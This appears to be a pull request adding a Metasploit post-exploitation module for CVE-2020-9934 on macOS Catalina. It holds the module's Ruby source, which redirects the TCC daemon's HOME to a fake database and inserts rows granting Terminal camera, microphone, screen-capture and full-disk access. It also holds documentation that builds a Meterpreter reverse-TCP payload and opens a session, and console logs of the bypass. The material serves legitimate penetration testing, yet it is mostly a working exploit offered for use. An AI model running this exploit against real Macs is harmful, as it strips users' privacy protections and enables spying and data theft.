### PR TITLE
Add module for CVE-2020-9934

### DIFF
--- a/documentation/modules/post/osx/escalate/tccbypass.md
+++ b/documentation/modules/post/osx/escalate/tccbypass.md
@@ -1,0 +1,91 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in the TCC daemon on macOS Catalina
+(<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be
+manipulated (by setting the HOME environment variable) to use a new user
+controlled location as the TCC database. We can then grant ourselves
+entitlements by inserting them into this new database.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Get a user session on OSX 10.15.5 (or lower)
+  1. Do: ```use post/osx/escalate/tccbypass```
+  1. Do: ```set SESSION -1```
+  1. Do: ```run```
+  1. Your session should now be able to access the ~/Documents folder
+
+## Scenarios
+
+### User level shell on macOS Catalina 10.15.4
+
+```
+msf6 > use payload/osx/x64/meterpreter/reverse_tcp
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lhost 192.168.135.197
+lhost => 192.168.135.197
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lport 4567
+lport => 4567
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > generate -f macho -o revtcpx64.mac
+[*] Writing 17204 bytes to revtcpx64.mac...
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 192.168.135.197:4567 
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > [*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (799916 bytes) to 192.168.132.178
+[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.178:49156) at 2020-09-10 11:44:05 -0500
+
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : msfusers-Mac.local
+OS           : macOS Catalina (macOS 10.15.4)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > getuid
+Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > ls Documents
+[-] 1009: Operation failed: 1
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > use post/osx/escalate/tccbypass 
+msf6 post(osx/escalate/tccbypass) > show options
+
+Module options (post/osx/escalate/tccbypass):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+msf6 post(osx/escalate/tccbypass) > set session 1
+session => 1
+msf6 post(osx/escalate/tccbypass) > set verbose true
+verbose => true
+msf6 post(osx/escalate/tccbypass) > run
+
+[*] Creating TCC directory /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC
+[+] fake TCC DB found: /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC/TCC.db
+[+] TCC.db was successfully updated!
+[*] To cleanup, run:
+launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
+rm -rf '/tmp/.SZulaEVB'
+
+[*] Post module execution completed
+msf6 post(osx/escalate/tccbypass) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > ls Documents 
+Listing: Documents
+==================
+
+Mode              Size  Type  Last modified              Name
+----              ----  ----  -------------              ----
+100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized
+
+meterpreter > 
+```

--- a/modules/post/osx/escalate/tccbypass.rb
+++ b/modules/post/osx/escalate/tccbypass.rb
@@ -15,8 +15,11 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'Bypass the macOS TCC Framework',
         'Description' => %q{
-          This module uses the CVE-2020-9934 to bypass the TCC framework and grant all
-          permissions to the Terminal application.
+          This module exploits a vulnerability in the TCC daemon on macOS Catalina
+          (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be
+          manipulated (by setting the HOME environment variable) to use a new user
+          controlled location as the TCC database. We can then grant ourselves
+          entitlements by inserting them into this new database.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -42,6 +45,7 @@ class MetasploitModule < Msf::Post
     unless system_version
       return Exploit::CheckCode::Unknown
     end
+
     version = Gem::Version.new(system_version)
     if version >= Gem::Version.new('10.15.6')
       return Exploit::CheckCode::Safe

--- a/modules/post/osx/escalate/tccbypass.rb
+++ b/modules/post/osx/escalate/tccbypass.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Post
         'SessionTypes' => [ 'shell', 'meterpreter' ]
       )
     )
-    register_options([
+    register_advanced_options([
       OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
     ])
   end
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Post
 
     print_status("Creating TCC directory #{tccdir}")
     cmd_exec("mkdir -p '#{tccdir}'")
-    cmd_exec("launchctl setenv HOME #{tmpdir}")
+    cmd_exec("launchctl setenv HOME '#{tmpdir}'")
     cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')
     if file_exist?(tccdb)
       print_good("fake TCC DB found: #{tccdb}")
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
     end
     print_good('TCC.db was successfully updated!')
     cleanup_command = 'launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd'
-    cleanup_command << "\nrm -rf #{tmpdir}"
+    cleanup_command << "\nrm -rf '#{tmpdir}'"
     print_status("To cleanup, run:\n#{cleanup_command}\n")
   end
 end

--- a/modules/post/osx/escalate/tccbypass.rb
+++ b/modules/post/osx/escalate/tccbypass.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bypass the macOS TCC Framework',
+        'Description' => %q{
+          This module uses the CVE-2020-9934 to bypass the TCC framework and grant all
+          permissions to the Terminal application.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mattshockl', # discovery
+          'timwr', # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2020-9934'],
+          ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],
+          ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],
+        ],
+        'Platform' => [ 'osx' ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ]
+      )
+    )
+    register_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
+    ])
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.15.6')
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def run
+    if check != Exploit::CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    tmpdir = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha(8)}"
+    tccdir = "#{tmpdir}/Library/Application Support/com.apple.TCC"
+    tccdb = "#{tccdir}/TCC.db"
+
+    print_status("Creating TCC directory #{tccdir}")
+    cmd_exec("mkdir -p '#{tccdir}'")
+    cmd_exec("launchctl setenv HOME #{tmpdir}")
+    cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')
+    if file_exist?(tccdb)
+      print_good("fake TCC DB found: #{tccdb}")
+    else
+      print_error("No fake TCC DB found: #{tccdb}")
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    tcc_services = [
+      'kTCCServiceCamera', 'kTCCServiceMicrophone', 'kTCCServiceAll', 'kTCCServiceScreenCapture', 'kTCCServiceSystemPolicyDocumentsFolder', 'kTCCService',
+      'kTCCServiceSystemPolicyDeveloperFiles', 'kTCCServiceSystemPolicyDesktopFolder', 'kTCCServiceSystemPolicyAllFiles', 'kTCCServiceSystemPolicyNetworkVolumes',
+      'kTCCServiceSystemPolicySysAdminFiles', 'kTCCServiceSystemPolicyDownloadsFolder'
+    ]
+    bundle = 'com.apple.Terminal'
+    csreq = 'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003'
+    isfile = '0'
+    timestamp = (Time.now + (60 * 60 * 24 * 365)).to_i.to_s # 1 year from now
+    for service in tcc_services
+      sql_insert = "INSERT INTO access VALUES('#{service}', '#{bundle}', #{isfile}, 1, 1, X'#{csreq}', NULL, NULL, 'UNUSED', NULL, NULL, #{timestamp});"
+      sqloutput = cmd_exec("sqlite3 '#{tccdb}' \"#{sql_insert}\"")
+      if sqloutput && !sqloutput.empty?
+        print_error("Output: #{sqloutput.length}")
+      end
+    end
+    print_good('TCC.db was successfully updated!')
+    cleanup_command = 'launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd'
+    cleanup_command << "\nrm -rf #{tmpdir}"
+    print_status("To cleanup, run:\n#{cleanup_command}\n")
+  end
+end

--- a/modules/post/osx/escalate/tccbypass.rb
+++ b/modules/post/osx/escalate/tccbypass.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Post
     tccdb = "#{tccdir}/TCC.db"
 
     print_status("Creating TCC directory #{tccdir}")
-    mkdir(tccdir)
+    cmd_exec("mkdir -p '#{tccdir}'")
     cmd_exec("launchctl setenv HOME '#{tmpdir}'")
     cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')
     unless file_exist?(tccdb)


### PR DESCRIPTION
Add a quick module for CVE-2020-9934, ping @mattshockl

## Verification

- [x] Get a session on OSX 10.15.5 (or lower)
- [x] Run the module:
```
use post/osx/escalate/tccbypass 
set SESSION 1
run
```
- [x] **Verify** you can now access the Documents folder


```
msf5 post(osx/escalate/tccbypass) > sessions

Active sessions
===============

  Id  Name  Type                 Information                                                                       Connection
  --  ----  ----                 -----------                                                                       ----------
  1         meterpreter x64/osx  user @ Users-MacBook-Pro.local (uid=501, gid=20, euid=501, egid=20) @ Users-M...  192.168.56.1:4444 -> 192.168.56.3:49166 (192.168.56.3)

msf5 post(osx/escalate/tccbypass) > sessions -C "ls Documents"
[*] Running 'ls Documents' on meterpreter session 1 (192.168.56.3)
[-] stdapi_fs_ls: Operation failed: 1
msf5 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.EhprHBDj/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.EhprHBDj/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf /tmp/.EhprHBDj

[*] Post module execution completed
msf5 post(osx/escalate/tccbypass) > sessions -C "ls Documents"
[*] Running 'ls Documents' on meterpreter session 1 (192.168.56.3)
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-03 23:29:00 +0800  .localized
100644/rw-r--r--  0     fil   2020-08-05 13:14:16 +0800  lol

```

